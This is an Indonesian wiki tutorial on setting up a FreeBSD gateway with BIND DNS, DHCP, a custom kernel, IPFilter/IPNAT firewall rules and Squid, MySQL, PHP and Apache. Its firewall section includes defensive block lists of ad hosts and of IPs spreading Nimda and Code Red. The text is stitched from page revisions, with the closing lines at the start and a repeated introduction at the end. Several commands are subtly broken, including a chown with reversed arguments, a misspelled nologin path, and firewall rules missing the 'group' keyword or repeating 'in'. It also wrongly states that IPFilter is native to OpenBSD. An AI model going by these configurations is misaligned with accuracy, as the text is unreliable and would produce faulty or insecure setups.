Terakhir, penulis dengan senang hati akan menerima kritik dan saran dari pembaca semua, semoga ada manfaatnya.

aa, aa.delphi@yahoo.com

URL: http://opensource.telkomspeedy.com/forum/viewtopic.php?pid=22122

Mengoptimalkan kemampuan firewall dan proxy server FreeBSD dalam sebuah network sederhana yang hanya memiliki satu IP global

2008-07-27T03:51:45Z

Aa: /* Konfigurasi dalam named.conf */

Sumber: aa, aa.delphi@yahoo.com
URL: http://opensource.telkomspeedy.com/forum/viewtopic.php?pid=22122

Dalam tulisan ini akan dibahas (mudah-mudahan) secara cukup detail, bagaimana mengoptimalkan kemampuan firewall dan proxy server FreeBSD dalam sebuah network sederhana yang hanya memiliki satu IP global, baik dinamik maupun statik (dial-up PPP, Cable-Modem atau DSL).

Model network seperti ini merupakan model yang sangat umum digunakan oleh warnet serta perusahaan kecil yang berniat untuk memberikan akses internet yang murah meriah bagi para karyawannya.

Teknik yang akan dibahas ini merupakan salah satu (mungkin merupakan yang terbaik) dibandingkan dengan alternatif lainnya seperti menggunakan hardware tertentu (modem dengan kapabilitas internet sharing), kelemahan: jumlah host sangat terbatas, antara 2 - 8, serta fleksibilitasnya sangat rendah, hampir tanpa menggunakan pengamanan dari intruder.

Pilihan lainnya adalah dengan sistem operasi MS Windows (yang sudah sangat familiar), fleksibilitas cukup, namun dengan tingkat pengamanan yang relatif rendah.

Pilihan OS lainnya seperti Linux, OpenBSD atau Solaris bisa juga diperhitungkan, namun overall performance, kombinasi FreeBSD dan IPF adalah yang terbaik dinilai dari segi keamanan/security, performansi, dukungan resources (software, kompatibilitas, utilitas dan dokumentasi) yang tersedia, serta biaya yang dibutuhkan. Dengan FreeBSD mesin 386 tua milik kita disulap menjadi sebuah server yang powerful, robust dan tahan banting.

cat: IPF (IPFilter) adalah paket firewal native dari OpenBSD, sistem operasi yang selama ini dinilai sebagai salah satu OS yang dianggap paling secure.

==Topologi Network==
<pre>
===============================================

_____
| ISP |
|_____|
DNS: 202.155.0.10, 202.155.0.20
|
| 10.20.30.40
___|___
|FreeBSD|...........
|_______| Virtual-Host 192.168.2.1
my.domain.box| Gateway
192.168.1.1 | Firewall - IPF/IPNAT
| DNS Server - BIND
Network: | HTTP Server - Apache
192.168.1.0 | Proxy Server - Squid
255.255.255.0| SQL Server - MySQL
|
|
_________|____...___
| | | |
__|__ __|__ __|__ __|__
Host1 Host2 Host3 HostN
</pre>

Ada 3 pokok bahasan utama dalam kasus ini.
# DNS
# DHCP Server
# IPF/IPNAT

lain-lain: Apache, MySQL dan Squid tidak akan dibahas panjang karena tidak esensial dalam konteks ini.

==DNS==

Untuk mengaktifkan name server jalankan /stand/sysinstal pilih menu Configure, kemudian Startup, lalu aktifkan (enable) named. Jika anda ingin menjalankan named dalam sandbox, isi named flags dengan argumen seperti dalam uraian butir 1.3.

Cara lainnya adalah dengan mengedit langsung /etc/rc.conf, ganti atau tambahkan entri di

/etc/rc.conf:
named_enable="yes"
named_flags="" #lihat uraian selanjutnya

==Cache-Only DNS Server==

Konfigurasi DNS yang paling sederhana, yang kemungkinan besar akan berjalan lancar adalah menggunakan konfigurasi jenis cache-only DNS Server, artinya server DNS kita TIDAK memiliki otoritas atas satu zone-pun juga kecuali localhost dan loopback network 127.

Kekurangan dari model DNS Server seperti ini adalah, tentu saja, host-host dalam network kita tidak dapat saling mengenal. Hal ini bisa kita uji dengan perintah ping dari satu host terhadap host lainnya.

cat.: Dalam terminologi BIND, zone adalah suatu area network dimana sebuah server DNS memiliki otoritas atas pengaturan nama atas host-host yang ada di dalamnya.

Untuk network yang relatif sederhana seperti pada small-office atau di organisasi kecil, suatu zone umumnya hanya berupa satu domain, sementara di organisasi yang cukup besar, seperti di lingkungan kampus dan terutama di sebuah ISP, biasanya sebuah server DNS akan menangani suatu zone yang terdiri atas lebih dari satu domain.

==Konfigurasi dalam named.conf==
<pre>
options {
directory "/etc/namedb";
forwarders {
// daftar DNS Server ISP kita misalnya:
202.155.0.10;
202.155.0.20;
};
};

zone "0.0.127.in-addr.arpa" {
type master;
file "localhost.rev";
};

zone "." {
type hint;
file "root.servers";
};
</pre>

==File-file database==

==File localhost.rev:==

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.
1 IN PTR localhost.domain.box.

cat.: Untuk menghindari salah ketik, sebaiknya kita cukup menjalankan perintah: sh make-localhost di direktori /etc/namedb.

==File root.servers:==
File ini tidak perlu dirubah, biarkan saja sesuai defaultnya.

==Internal-Root DNS Server==
Seperti dapat dilihat pada gambar diatas, network kita termasuk kedalam network kelas C, dengan alamat 192.168.1.0 dan netmask 255.255.255.0. IP address network card pertama (if_1) ditetapkan oleh ISP, sementara if_2 dapat kita tentukan sendiri.

Selanjutnya kita dapat menetapkan hal-hal sebagai berikut:

Zone/domain: domain.box
Reverse-Network: 1.168.192.in-addr.arpa
Server address: 192.168.1.1
Server name: my.domain.box

==Konfigurasi dalam named.conf:==

==Konfigurasi awal (Cache-Only DNS Server):==

options {
directory "/etc/namedb";
forwarders {
// daftar DNS Server ISP:
202.155.0.10;
202.155.0.20;
};
version "19.09.1969";
};

zone "0.0.127.in-addr.arpa" {
type master;
file "localhost.rev";
};

==Konfigurasi named.conf yang perlu ditambahkan (atau dirubah):==

forward;

zone "domain.box" {
type master;
file "box/domain.db";
};

zone "1.168.192.in-addr.arpa" {
type master;
file "box/domain.rev";
};

zone "." {
type hint;
//file "root.servers";
file "box/root.box";
};

==File-file database==

==File localhost.rev:==

Tidak perlu ada perubahan dalam file ini, sama dengan butir 1.1.2.1 diatas.

==File domain.db:==

Berisi daftar translasi name to address untuk seluruh host yang ada di domain domain.box, hati-hati character comment di sini adalah semi-colon (;) bukan hash (#).

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

localhost IN A 127.0.0.1

my IN A 192.168.1.1
host1 in cname my
host2 IN A 192.168.1.2
host3 IN A 192.168.1.3
..
..
..
host254 IN A 192.168.1.254

cat.: Perhatikan bahwa dalam database ini kita perlu menambahkan entri untuk localhost, sehingga setiap rujukan atas localhost, dari manapun juga, akan diarahkan ke loopback masing-masing.

==File domain.rev:==
Kebalikan dari domain.db, merupakan reverse address to name atas domain.box untuk network 192.168.1.0/24

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

1 IN PTR my
2 IN PTR host1
3 IN PTR host2
..
254 IN PTR host254

cat.: Perhatikan bahwa tidak bisa dilakukan reverse untuk alias atau CNAME (canonical-name). Tidak diperbolehkan terdapat *dua entri yang sama* untuk *satu nomor address*, atau dengan kata lain, satu nomor adress tidak boleh merujuk kepada dua nama yang berbeda. Sebaliknya bisa saja terdapat dua nomor address untuk satu nama, misalnya jika kita memiliki dua atau lebih network card dalam satu host yang masing-masing memiliki IP sendiri.

==File root.box:==

File ini merupakan modifikasi dari file root.servers, yaitu dengan menambahkan RR (Resource Record) yang menyatakan bahwa server kita memiliki otoritas atas root domain.

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

;domain "domain.box" didelegasikan langsung dari root
domain.box. 9999999 IN NS my.domain.box.

;juga reverse dari class-C network
1.168.192.in-addr.arpa 9999999 IN NS my.domain.box.

;glue records
my.domain.box. IN A 192.168.1.1

;daftar root server selanjutnya sama dengan default di file root.servers
..

==DNS Server in the sand-box==

Konfigurasi server DNS ini terutama ditujukan untuk memperketat sekuriti sistem network, prinsipnya sederhana, yaitu menjalankan servis DNS (named) oleh non-privilege user, untuk ini biasanya sengaja dibuat satu user khusus, tanpa fasilitas login.
Sebenarnya untuk model network kita yang sederhana, ancaman sekuriti yang ada mungkin tidak akan terlalu serius. Konfigurasi ini bisa jadi sebagai opsi yang bisa diambil ataupun tidak.

1.3.1
Buat user baru untuk servis DNS, misalnya dengan nama: bind.
User group: bind (default)
User home: /usr/local/bind
shell: no, nologin atau nonexistent

1.3.2
ganti atau tambahkan entri di /etc/rc.conf:
named_flags="-u bind -g bind -w /usr/local/bind -c named.conf -t /usr/local/bind"

Penjelasan atas argumen:
-u dan -g: user serta group yang menjalankan servis DNS adalah "bind".
-w dan -c: direktori kerja dan nama file konfigurasi yang dipakai.
-t: setelah melakukan inisialisasi, servis DNS menjadikan /usr/local/bind
sebagai root direktorinya (chroot).

Dengan penggantian user, group dan chroot, servis DNS ini tidak lagi memiliki akses tak-terbatas atas resources, sehingga perlu dilakukan lagi beberapa penyesuaian:

1.3.2.1

Servis named dan ndc biasanya menampilkan prosess-id-nya dibawah sub-direktori /var/run, karena root-directory-nya berubah, maka kita harus membuat secara manual subdirektori /var/run dibawah /usr/local/bind, jangan lupa ownershipnya harus disesuaikan menjadi bind:bind

1.3.2.1

Jika penyesuaian sub-direktori diatas tidak dilakukan maka setidaknya harus dibuat penyesuaian dalam option named.conf:
[pre]
options {
...

directory "/"; //(atau mudahnya hapus saja option ini)
pid-file "named.pid" //named.pid berada di direktori root yang baru

...
}
[/pre]

1.3.3

Pindahkan atau salin /etc/namedb ke /usr/local/bind.

cat.: Perhatikan ownership dari /usr/local/bind, jika kita menyalinnya dengan tool atau file-manager seperti midnight- commander, biasanya ownership akan berubah dari bind ke root (atau privileged user pada saat itu), sehingga harus dikembalikan lagi dengan chown -r bind:bind /usr/local/bind.

Penyesuaian ownership ini juga berlaku untuk direktori baru dibawahnya yang kelak digunakan untuk file-file yang meminta akses-tulis seperti log, dump, stat, pid, dsb.

1.3.4
[pre]
Hentikan proses named yang saat itu berlangsung (dengan kill, killall atau top), lalu aktifkan kembali named (dengan argumen seperti named_flags diatas), atau reboot server.
[/pre]

2. DHCP Server

2.1. Instalasi dan Setup

Dengan /stand/sysinstall, install package isc-dhcpd.
Instalasi ini hanya sekedar mengekstrak program dan dokumentasi dhcpd, kita *harus* membuat sebuah file yaitu /var/db/dhcpd.lease secara manual: touch /var/db/dhcpd.leases.
Edit file /usr/local/etc/dhcpd.conf dengan editor kesayangan anda, fi-ay :), dan buat alokasi dinamis IP addresses untuk network 192.168.1.0/24 misalnya:

#jangan lupa menggunakan fasilitas syslog
#dalam syslog.conf tambahkan entry sbb:
# local7* /var/log/dhcpd.log #awas: pake TAB, jangan pake spasi!

log-facility local7;
authoritative;
ddns-update-style ad-hoc;

option domain-name "domain.box";

subnet 192.168.1.0 netmask 255.255.255.0 {
option netbios-name-servers 192.168.1.3; #server NT kita
option domain-name-servers 192.168.1.1;
option routers 192.168.1.1;
pool { range 192.168.1.10 192.168.1.190; }
}

2.2. Menjalankan dhcpd
DHCP server sebaiknya dijalankan pada saat boot-up dengan membuat file startup di /usr/local/etc/rc.d
Untuk menjalankan secara manual ketikan perintah: dhcpd if_2 (if_2 adalah interface yang terhubung dengan network lokal)

3.IPF/IPNAT

'Official' firewall dari FreeBSD adalah ipfw/natd, kelebihan ipfw terutama adalah kemampuan untuk mengatur kuota bandwith, sementara kelebihan ipf/ipnat yang paling utama adalah performansi. Juga menurut authornya, ipf benar-benar melakukan kontrol terhadap TCP/IP state, tidak cuma artifisial (sekedar mengecek kombinasi flags tertentu seperti SYN/ACK) seperti yang dilakukan dalam paket firewall lainnya.

Dalam bahasan kali ini, kita akan menggunakan IPFilter/IPNAT.

3.1. Kompilasi kernel

Untuk memasang firewall kita harus mengkompile ulang kernel (selanjutnya kita bisa mencopot-pasang lagi lewat loadable kernel module).

3.1.1 Konfigurasi kernel

cd /usr/src/sys/i386/conf
option tambahan kernel kita dari GENERIC adalah sbb:

#--- start kernel options ---
#hapus semua options cpu kecuali model tertinggi sesuai cpu anda
#cpu I386_CPU
#cpu I486_CPU
#cpu I586_CPU
cpu I686_CPU
maxusers 32

#kostumisasi kernel (lihat juga catatan tambahan)
ident AA
makeoptions KERNEL=AA

#jangan lupa mengganti entri di /boot atau /etc/defaults/rc.conf
#userconfig_script_load="YES"
#kernel="/AA"
#verbose_loading="YES"
#autoboot_delay="3"
#bootfile="AA,aa,kernel"

#kita tidak memakai 386SX kebawah, jadi emulasi mathco bisa dihapus saja
#options GPL_MATH_EMULATE #Support for x87 emulation

#console menggunakan teks mode 90x60
device vga0 at isa?
options VGA_WIDTH90 #90 baris VGA
options VESA

#jangan lupa nanti tambahkan font dan screenflags di /etc/rc.conf sbb:
#font8x14="cp437-8x14"
#font8x16="cp437-8x16"
#font8x8="cp437-8x8"
#allscreens_flags="VGA_90x60"

#hapus splash screen/screen saver.
#pseudo-device splash

#selain UFS, dalam box kita terdapat juga NTFS dan EXT2FS
options NTFS #NT
options EXT2FS #Linux
options NFS_NOSERVER #Membuang kode NFS

#options UNION #UFS bisa digabung
#options NULLFS #null
#options UMAPFS #UID Map FileSystem
#options KERNFS #kernel
#options SMBFS #SMB/File Sharing ala Windows
#options PROCFS #memetakan Process ID

# Tambahkan flags 0xb0ff (maks. drive blok transfer) untuk hard-disk
# untuk sepasang hard-disk per-interface flagsnya adalah 0xb0ffb0ff
device ata0 at isa? port IO_WD1 irq 14 flags 0xb0ffb0ff
device ata1 at isa? port IO_WD2 irq 15 flags 0xb0ffb0ff

options SOFTUPDATES #penting untuk meningkatkan performansi
options ATA_STATIC_ID #Static device numbering

#hapus saja tape-drive.
#device atapist # ATAPI tape drives

# jika menggunakan APM, sebaiknya tidak.
#device apm0 at nexus? disable flags 0x20 # Advanced Power Management

# PCCARD (PCMCIA) support, buang saja
#device card
#device pcic0 at isa? irq 0 port 0x3e0 iomem 0xd0000
#device pcic1 at isa? irq 0 port 0x3e2 iomem 0xd4000 disable

#Buang saja serial 2 dan 3
#device sio2 at isa? disable port IO_COM3 irq 5
#device sio3 at isa? disable port IO_COM4 irq 9

#Buang juga koneksi lewat Parallel port
#device plip # TCP/IP over parallel
#device ppi # Parallel port interface device
#device vpo # Requires scbus and da

#Buang semua entri ethernet yang tidak ada
#saya cuma punya 3Com 3C509, 3C905 dan realtek
device ep # 3Com 3C509 (10 MBps)
device xl # 3Com 3c905 (10/100)
device rl # RealTek 8129/8139 (10/100)
#device de # Realtek lama (10)

#Banyak software yang tergantung kepada bpf
#(discouraged), tapi sebaiknya tetap dipasang
pseudo-device bpf #Berkeley packet filter

#Buang semua options USB yang hardwarenya tidak ada
device uhci # UHCI PCI->USB interface
device ohci # OHCI PCI->USB interface
device usb # USB Bus (required)
device ugen # Generic
#device uhid # "Human Interface Devices"
#device ukbd # Keyboard
#device ulpt # Printer
#device umass # Disks/Mass storage - Requires scbus and da
#device ums # Mouse
#device uscanner # Scanners
# USB Ethernet, requires mii
#device aue # ADMtek USB ethernet
#device cue # CATC USB ethernet
#device kue # Kawasaki LSI USB ethernet

#Soundcard (generik)
device pcm

#jangan lupa nanti untuk membuat entri2 sound
#(audio, mixer, sequencer dll) di /dev:
#cd /dev
#./MAKEDEV snd

#Intel PIIX4 Power Management Unit
#device smbus
#device intpm

#Berhubung SCSI card saya sudah sangat kuno, akhirnya saya cabut :)
#Jika tidak memiliki SCSI, semua options yang behubungan dengan skasi
#bisa dibuang

#options SCSI_DELAY=8000 #Delay (in ms) before probing SCSI
# SCSI Controllers
#...
# SCSI peripherals
#...

#Jika menggunakan firewall bawaan FreeBSD:
#options IPFIREWALL
#options IPDIVERT
#options IPFIREWALL_VERBOSE
#options IPFIREWALL_VERBOSE_LIMIT=32
#options IPFIREWALL_DEFAULT_TO_ACCEPT

#Jika anda memasang bandwith quota tambahkan entri dibawah ini
#options IPDIVERT #digunakan juga oleh ipfw/natd
#options DUMMYNET
#options QUOTA

#Konfigurasi ipfilter/ipnat ini yang kita pakai
#cat. jika menggunakan IPFilter TIDAK PERLU ditambahkan
#lagi options IPDIVERT seperti yang terdapat dalam
#beberapa dokumentasi online

options IPFILTER
options IPFILTER_LOG
options IPFILTER_DEFAULT_BLOCK

#untuk memperketat firewall bisa ditambahkan options dibawah ini:
options IPSTEALTH
options TCP_DROP_SYNFIN
options TCP_RESTRICT_RST

options MROUTING
options RANDOM_IP_ID

#beberapa options lainnya untuk memacu performa
options NBUF=4096
options NMBCLUSTERS=8192

#catatan tambahan:

#Jika anda ingin mengubah release, copyright et-al., lakukan perubahan ini
#di /usr/src/sys/conf/newvers.sh

#dari original
#TYPE="FreeBSD"
#REVISION="4.3"
#BRANCH="RELEASE"
#RELEASE=4.3-RELEASE
#VERSION="${TYPE} ${RELEASE}"
if [ X"$COPYRIGHT" = X ]; then
COPYRIGHT="/*
* Copyright (c) $year
* FreeBSD Inc. All rights reserved.
*
*/"
fi

#menjadi violated
TYPE="mbakNunix"
REVISION="1.31"
BRANCH="BURIX"
RELEASE=1.31-BURIX
VERSION="${TYPE} ${RELEASE}"
COPYRIGHT="
/*** aa, aa.delphi@yahoo.com, 1995-$year ***/
"

2.1.2 Kompilasi

Akhirnya kita kompile kernel sbb:

su (kita harus root)
cd /usr/src/sys/i386/conf
chflags noschg AA (jika sekuriti diperketat, biasanya kernel diberi flag schg)

/usr/sbin/config -r AA && \
cd ../../compile/$1 && \
(make depend) 2>~/err1 && \
make 2>~/err2 && \
(make install) 2>~/err3

semua error message masing-masing akan dicatat di /root, file: err1, err2 dan err3

3.2. Mengkonfigurasi IPF/IPNAT

3.2.1. Konfigurasi rc.conf
Konfigurasi umum seperti biasa dilakukan di rc.conf

3.2.2. Konfigurasi syslog.conf

3.2.3. Tuning sysctl.conf
net.inet.ip.forwarding=1
net.inet.ip.fastforwarding=1

3.2.4. ipnat.rules
Rules untuk IPNAT dibahas lebih dulu karena relatif jauh lebih sederhana daripada rules untuk IPF

Catatan:
map artinya: remap SOURCE packet's IP address
rdr artinya: redirect DESTINATION of packet's IP address

Tambahkan baris berikut untuk mengemap :) port ftp

map rl1 192.168.1.0/24 -> 0/32 proxy port 21 ftp/tcp
map rl1 192.168.1.0/24 -> 0/32 portmap tcp/udp 49152:65535 #nomor port bebas antara 0-65535
map rl1 192.168.1.0/24 -> 0/32

HTTP request di redirect ke server

rdr rl1 0/32 port 80 -> 192.168.1.1 port 80 tcp

#jika perlu permintaan http dari lokal bisa di redirect ke SQUID port 3128
#rdr rl0 0.0.0.0/0 port 80 -> 192.168.1.1 port 3128 tcp

3.2.5. ipf.rules

Default konfigurasi adalah block in all, block out all artinya dengan konfigurasi seperti ini server kita benar-benar jadi mahluk egois, tidak mau melihat kanan-kiri sedikitpun :)

konfigurasi paling sederhana yang bisa berjalan adalah:

pass in all
pass out all

Artinya sama saja dengan tidak memasang firewall.

jika server kita hanya digunakan untuk mengakses internet keluar (outward-only), cukup kita isi firewall rules dengan satu baris:

pass out quick all keep state keep frags

untuk ipf ver 4.32 (FreeBSD 4.5+) rule "keep" tidak bisa diterapkan kepada paket selain tcp/udp/icmp, jadi rule diatas dibagi menjadi:

pass out quick proto tcp/udp all keep state keep frags
pass out quick proto icmp all keep state keep frags
pass out quick all

Dengan menggunakan keep state, kita tinggal membuka port yang kita perlukan saja, lalu-lintas koneksi yang terkait dengan servis/port tsb selanjutnya ditangani oleh ipf, misalnya:

block in quick all
pass out quick proto icmp all icmp-type echo keep state

meski diatas terdapat block, icmp-reply akan tetap bisa masuk masuk karena memang diminta oleh icmp-echo.
pada protokol tcp/udp lainnya, pembukaan gerbang masuk ini mencakup juga control messages berupa icmp atau bahkan segmen IP dengan nomor port lainnya yang berbeda, yang masih terkait dalam koneksi tersebut.

catatan tambahan:
Sebaiknya keep-state jangan terlalu di-obral supaya tidak menghabiskan resources atau bahkan membuka celah security berupa Denial of Service (DoS) Attack, lebih tepat kiranya jika hanya protokol TCP dengan SYN Flag serta port-port tertentu saja yang dipasangi keep-state seperti FTP (21), SSH (22), SMTP (25), DNS (53), DHCP (67/58), serta ICMP echo.
Jika hanya permintaan koneksi (ditandai dengan SYN flag) dari servis/port tertentu yang dibuka, jalur masuk semua ditutup (block in all), port FTP mau tidak mau harus diberi keep state karena setelah koneksi terjadi dia akan membuka port/jalur baru (UDP port 20, atau TCP dengan unassigned [high number] port) untuk komunikasi data.

pass out quick proto tcp flags S keep state
pass out quick proto udp port = 53 keep state
pass out quick proto icmp all icmp-type echo keep state
pass out quick all

Karena pembahasan ipf ini cukup panjang, maka akan kita singkat saja dengan menggunakan rules yang berguna secara umum

[pre]
#UMUM
pass in quick on lo0
pass out quick on lo0

#NBNS
block return-rst in quick proto tcp all port 136 >< 140
block return-icmp-as-dest(port-unr) in quick all port 136 >< 140

#============================================================
#if_1 adalah eksternal interface (yang terhubung ke internet)
#============================================================

#INWARD
#------
block in quick on if_1 all head 10000
#Start group 10000

block in quick all with opt lsrr group 10000 #block loose src routing
block in quick all with opt ssrr group 10000 #block strict src routing
block in quick proto tcp all with frags group 10000

#block no. ip address yang diketahui berbahaya, bervirus dsb.
#block in quick proto tcp/udp from Danger_IPs group 10000
#(lihat daftar 3.2.5.2)

pass in quick proto tcp all port = http flags S keep state group 10000 #jika kita pasang web server

block in quick proto icmp all head 11000 group 10000 #blok icmp yang tidak perlu
#Start group 11000
#pass in log first quick proto icmp all icmp-type echo group 11000
pass in quick proto icmp all icmp-type echorep group 11000
pass in quick proto icmp all icmp-type unreach group 11000
pass in quick proto icmp all icmp-type redir group 11000
pass in quick proto icmp all icmp-type timex group 11000
block in return-icmp-as-dest(host-unr) in quick all group 11000
#End group 11000

#__________________________________________________
block return-rst in quick proto tcp all group 10000
block return-icmp-as-dest(port-unr) in quick all group 10000

#End group 10000

#OUTWARD bebas
#-------------
block out quick on if_1 all head 20000
pass out quick proto tcp/udp all keep state keep frags group 20000
pass out quick proto icmp all keep state keep frags 20000
pass out quick all 20000

#===========================================================
#if_2 adalah internal interface (yang terhubung ke intranet)
#===========================================================

#INWARD
#------
block in quick on if_2 all head 30000
#Start group 30000

#Test User, tahan uninitialized host
block in quick from !192.168.1.1/24 to any head 31000 group 30000
#Start group 31000

#Unknown User, harus daftar dhcp dulu
pass in log first quick proto tcp/udp from any port = 68 to any port = 67 group 31000
block return-icmp-as-dest(host-unk) in log first quick all group 31000 #Unknown

#HTTP
#Tahan dulu http untuk diinterogasi, mau kemanakah tujuannya.
block in log first quick all port = http head 32000 group 31000
#Start group 32000

#HTTP block template: popups, junker, spammer etc. dilarang!
block return-rst in log first quick proto tcp from any to 64.38.238.0/18 group 32000 #ADS!
block return-rst in log first quick proto tcp from any to 66.28.153.36/24 group 32000 #porn&spy!
#...dst (lihat daftar 3.2.5.1 yang berisi IP popups/spyies)

#aman...
pass in log first quick proto tcp all flags S keep state keep frags group 32000

#HTTP-TCP only, yg lainnya di-blok by default!
block return-rst in quick proto tcp all group 32000

#End group 32000
#End group 31000

#Pada tahap ini user telah dikenal (dari 192.168.1.1/24) dan dengan permintaan port selain http
#atau user dari 192.168.1.1/24 dengan port http namun protokolnya selain tcp

#Tahan permintaan DNS keluar
block return-icmp-as-dest(filter-prohib) in quick proto tcp/udp from any to 202.155.0.10/24 port = domain group 30000

pass in log first quick proto tcp/udp all port < 1024 keep state group 30000 #regular ports
pass in log first quick proto tcp/udp all port = 3130 keep state group 30000 #SQUID
pass in log first quick proto tcp/udp all port = 3306 keep state group 30000 #MySQL

#__________________________________________________
#lainnya secara default di-blok
block return-rst in quick proto tcp all group 30000
block return-icmp-as-dest(port-unr) in quick all group 30000

#End group 30000

#OUTWARD bebas
#-------------
block out quick on if_2 all head 40000
pass out quick proto tcp/udp all keep state keep frags 40000
pass out quick proto icmp all keep state keep frags 40000
pass out quick all 40000
[/pre]

3.2.5.1 Daftar alamat IP popup
Berikut ini daftar ip popup dan advertising banner, spy, spammer dll yang selain menyebalkan juga kadang berbahaya.
cat.: ganti kata "BLOK" dengan: "block return-rst in log first quick proto tcp from any to", juga nomor group disesuaikan dengan konfigurasi

#HTTP block template

#Hall Of Fames - top of sh*ts!-
BLOK 64.38.238.0/18 group 42000 #popups.ini
BLOK 64.38.223.51/24 group 42000 #!!!trafficcashgold.com
BLOK 64.38.226.6/24 group 42000 #maxcash.cavecreek.net
BLOK 64.38.247.60/24 group 42000 #count1-old.paycounter.com[]
BLOK 205.180.85.40/24 group 42000 #popups.ini TOP!!! media.fastclick.net
BLOK 202.180.8.129/24 group 42000 #ns1.servercyber.com
BLOK 207.68.178.251/24 group 42000 #ads.msn.com
BLOK 207.68.185.58/24 group 42000 #autosearch.msn.com
BLOK 207.68.171.254/24 group 42000 #adobe-spy
BLOK 207.68.172.253/24 group 42000 #adobe-spy
BLOK 207.68.173.254/22 group 42000 #adobe-spy
BLOK 209.225.0.6/24 group 42000 #servedby.advertising.com
BLOK 209.225.4.72/24 group 42000 #advertising.com

#telkom!dont-block: BLOK 203.130.252.36/24 group 42000 #mencurigakan sih

#dangerous!
BLOK 66.28.38.3/24 group 42000 #
BLOK 209.50.252.100/24 group 42000 #4bigcash.com
BLOK 209.5.187.10/24 group 42000 #freepopups.com
#BLOK 209.5.187.16/24 group 42000 #adpowerzone.com
#BLOK 213.249.1.67/24 group 42000 #d67.kif2.nas.panafonet.gr
#End dangerous

#from popups.ini
BLOK 12.42.235.3/24 group 42000 #popups.ini
#...long-list...
BLOK 216.95.228.15/24 group 42000 #popups.ini
#end-from popups.ini

#new compilation
#BLOK 66.206.15.201/24 group 42000 #indo-porn, gapapa-lah
BLOK 63.167.204.56/24 group 42000 #7adpower.com
#...long-list...
BLOK 128.11.42.61/24 group 42000 #burstnet.com
#dont-block-yahoo: BLOK 66.218.71.80/24 group 42000 #w1.scd.yahoo.com
#end-new compilation

#old compilation
BLOK 12.90.179.10/16 group 42000
BLOK 63.215.149.25/24 group 42000 #porno
BLOK 192.150.10.120/16 group 42000 #adobe spyier!!!
#...long-list...
BLOK 216.218.220.42/24 group 42000 #servergold.com - porn
#beware! Namezeroes are always peeking our nbns port!
BLOK 216.34.13.245 port != 80 group 42000

#end-old-compilation

3.2.5.2 Daftar alamat IP berbahaya
Berikut ini daftar alamat IP berbahaya karena menyebarkan virus nimda atau code-red hingga tulisan ini dibuat (mungkin IP anda tercantum disini, selamat! :)).
penggunaannya dalam ipf.rules misalnya:

block return-rst in log first quick on rl1 proto tcp from 202.10.35.227 to any Group 23456 #Nimda

4.47.218.144#code_red

#internal INDOSAT NET-10.X.X.X
10.1.8.108#nimda
10.6.2.4#nimda
#...long-list...
10.6.18.68#nimda
#end: internal INDOSAT NET-10.X.X.X

24.73.201.22#code_red
24.80.172.120#code_red
#...long-list...
24.196.16.168#code_red
219.8.104.74#nimda

4.Lain-lain
Dalam bagian ini diasumsikan bahwa kita akan menginstal program dari source kodenya, yang diekstrak ke direktori /usr/local/src, mis.: tar -xpvzf apache.tgz -C /usr/local/src.
bagian version number, jika ada, sebaiknya dihilangkan, mis.: mv apache-1.1.23pl8 apache

4.1. Squid
/configure --enable-ipf-transparent \

#parameter lain yang perlu:
--prefix=/usr/local \
--bindir=\${prefix}/sbin \
--libexecdir=\${prefix}/libexec \
--sysconfdir=\${prefix}/etc/squid \

#parameter lain yang mungkin perlu:
--enable-storeio="ufs diskd null" \
--enable-removal-policies="lru heap" \

#parameter tambahan:
--localstatedir=\${prefix}/squid \
--host=i686 \
--disable-ident-lookups \
--disable-wccp \
--enable-kill-parent-hack \
--enable-time-hack \
--with-pthreads

make all; make install

Dengan parameter diatas kita akan memperoleh konfigurasi squid yang mirip seperti jika kita menginstalnya melalui package.
Kemudian file logs dan cache di direktori /usr/local/etc/squid di chown nobody:nogroup (atau sesuai dengan usernya jika telah dibuat user untuk squid, seperti user mysql dibawah).
Setelah itu kita buat intial cache directory dengan menjalankan: squid -z. Default cache size adalah 100MB.

==Konfigurasi MySQL, PHP dan Apache==

==MySQL==

/configure \
--localstatedir=/var/db/mysql \
--with-unix-socket-path=/var/run/mysql.sock \
--host=i686 \
--enable-assembler \
--with-libwrap \
--with-berkeley-db \
--with-named-z-lib \
--with-mysqld-ldflags=-all-static \
--with-client-ldflags=-all-static \
--without-debug \
--without-bench \
--without-docs \
--without-readline

make; make install

Tambahkan user mysql dengan ID misalkan = 3036

pw add group mysql -g 3036
pw add user mysql -u mysql -g mysql -wno -s /sbin/nologint -d /var/db/mysql -c "MySQL"

Direktori localstatedir (/var/db/mysql) diatas, *harus* read/write by user mysql:
chown -R /var/db/mysql mysql:mysql

==PHP==
Sebelumnya kita harus cd ke source apache dulu: cd /usr/local/src/apache, lalu jalankan ./configure (plain).

Kemudian baru cd ke source php: cd /usr/local/src/php dan mengkonfigurasi php sesuai preferensi kita.

/configure \
--build=i686 \
--prefix=/usr/local \
--with-mysql=/usr/local \
--with-apache=../apache \
--with-pcre-regex=/usr/local \
--with-mcrypt \
--with-zlib \
--with-ftp \
--enable-track-vars \
--enable-ctype

make; make install

==Apache==

/configure \
--enable-module=most \
--enable-shared=max \
--server-uid=www \
--server-gid=www \
--activate-module=src/modules/php4/libphp4.a

make; make install

==Penutup==

Sesuai dengan tujuan utama tulisan ini, beberapa sub-sistem mungkin hanya sedikit atau sama sekali tidak dibahas, bagian-bagian tersebut dianggap sesuai dengan instalasi default.
Terakhir, penulis dengan senang hati akan menerima kritik dan saran dari pembaca semua, semoga ada manfaatnya.

aa, aa.delphi@yahoo.com

URL: http://opensource.telkomspeedy.com/forum/viewtopic.php?pid=22122

Mengoptimalkan kemampuan firewall dan proxy server FreeBSD dalam sebuah network sederhana yang hanya memiliki satu IP global

2008-07-27T03:50:13Z

Aa: /* Topologi Network */

Sumber: aa, aa.delphi@yahoo.com
URL: http://opensource.telkomspeedy.com/forum/viewtopic.php?pid=22122

Dalam tulisan ini akan dibahas (mudah-mudahan) secara cukup detail, bagaimana mengoptimalkan kemampuan firewall dan proxy server FreeBSD dalam sebuah network sederhana yang hanya memiliki satu IP global, baik dinamik maupun statik (dial-up PPP, Cable-Modem atau DSL).

